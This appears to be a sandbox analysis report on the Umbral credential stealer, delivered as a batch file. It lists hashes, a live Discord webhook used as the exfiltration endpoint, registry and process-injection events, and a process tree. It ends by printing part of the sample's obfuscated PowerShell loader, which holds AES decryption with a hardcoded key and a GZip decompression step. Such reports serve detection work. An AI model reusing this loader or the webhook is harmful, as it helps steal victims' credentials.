umbral | b99eb432b5d440a41faf8ed09c3df4ff0cf82ca13fefed8c2cb56ca96960ab4d

General

Target

Umbral.bat
Size

468KB
MD5

50c1619dde4c59211f2220d19fd7a2ff
SHA1

f89a90307b00ff0bd2733642ea43427bc304c730
SHA256

b99eb432b5d440a41faf8ed09c3df4ff0cf82ca13fefed8c2cb56ca96960ab4d
SHA512

ed591a3357cc3e3487b708f2e08a74683c93d5e5e16d1978f90f4dc37b77f147bb36ba3cb55318d146c0831f7636baa22006b6c9960db3e8a72dbdc798efb627
SSDEEP

12288:7WdGCJGwwo92cPLI0O8JtFDUB9PvBxdCAI2hlojjF9xq:SNswwxcjJngP3PdCVuM9xq

Score

10^/10

umbral execution stealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1289565581565104128/6_mwv0w1S5A0l9XLPkwW6UmUZxdAw3mP7dh5lsWmFsgqgu5kJGEszt1-zAw_BajgNh6i

Signatures

Detect Umbral payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2960-112-0x000002CB6FF20000-0x000002CB6FF60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

13 2960 powershell.exe
15 2960 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2960 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ip-api.com

flow	pid	process
13	2960	powershell.exe
15	2960	powershell.exe

flow	ioc
14	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe

Modifies registry class 22 IoCs

Processes:

svchost.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133727688378749299"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731976610668822"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975690353301"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731976004262606"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975998481252"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133727688376561726"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731976625668849"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731975747543810"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975993637730"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975748793946"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731975750981344"	svchost.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exe

pid	process
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

3520 Explorer.EXE
3520 Explorer.EXE

pid	process
3520	Explorer.EXE
3520	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exesvchost.exe

description	pid	process	target process
PID 3672 wrote to memory of 384	3672	cmd.exe	cmd.exe
PID 3672 wrote to memory of 384	3672	cmd.exe	cmd.exe
PID 3672 wrote to memory of 2960	3672	cmd.exe	powershell.exe
PID 3672 wrote to memory of 2960	3672	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3520	2960	powershell.exe	Explorer.EXE
PID 2960 wrote to memory of 2556	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 3540	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1764	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 4952	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1556	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1160	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1748	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 952	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 948	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 4884	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1532	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2908	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2708	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1524	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1716	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2304	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1120	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1308	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 720	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1500	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2680	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1300	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 904	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 3660	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1892	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1292	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1880	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2076	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1988	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2064	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 3432	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1652	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2232	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1144	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2816	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1976	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1828	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1032	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2804	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1420	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2400	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2392	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1012	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 796	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 2764	2960	powershell.exe	svchost.exe
PID 2960 wrote to memory of 1184	2960	powershell.exe	svchost.exe
PID 796 wrote to memory of 932	796	svchost.exe	wmiprvse.exe
PID 796 wrote to memory of 932	796	svchost.exe	wmiprvse.exe
PID 2960 wrote to memory of 5064	2960	powershell.exe	wmic.exe
PID 2960 wrote to memory of 5064	2960	powershell.exe	wmic.exe
PID 796 wrote to memory of 3172	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 3172	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 3172	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 8	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 8	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 8	796	svchost.exe	backgroundTaskHost.exe
PID 796 wrote to memory of 2456	796	svchost.exe	BackgroundTransferHost.exe
PID 796 wrote to memory of 2456	796	svchost.exe	BackgroundTransferHost.exe
PID 796 wrote to memory of 2456	796	svchost.exe	BackgroundTransferHost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:796
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:932
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3172
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:8
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:2456
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:1972
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:5036
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3432

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JBDmY5Rm32yFC2eFK/K6i05UDHc2UnMQkJErjy0URRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIqIhLZZ4mABnJftMk1zig=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LaItK=New-Object System.IO.MemoryStream(,$param_var); $BkPnB=New-Object System.IO.MemoryStream; $dqAwB=New-Object System.IO.Compression.GZipStream($LaItK, [IO.Compression.CompressionMode]::Decompress); 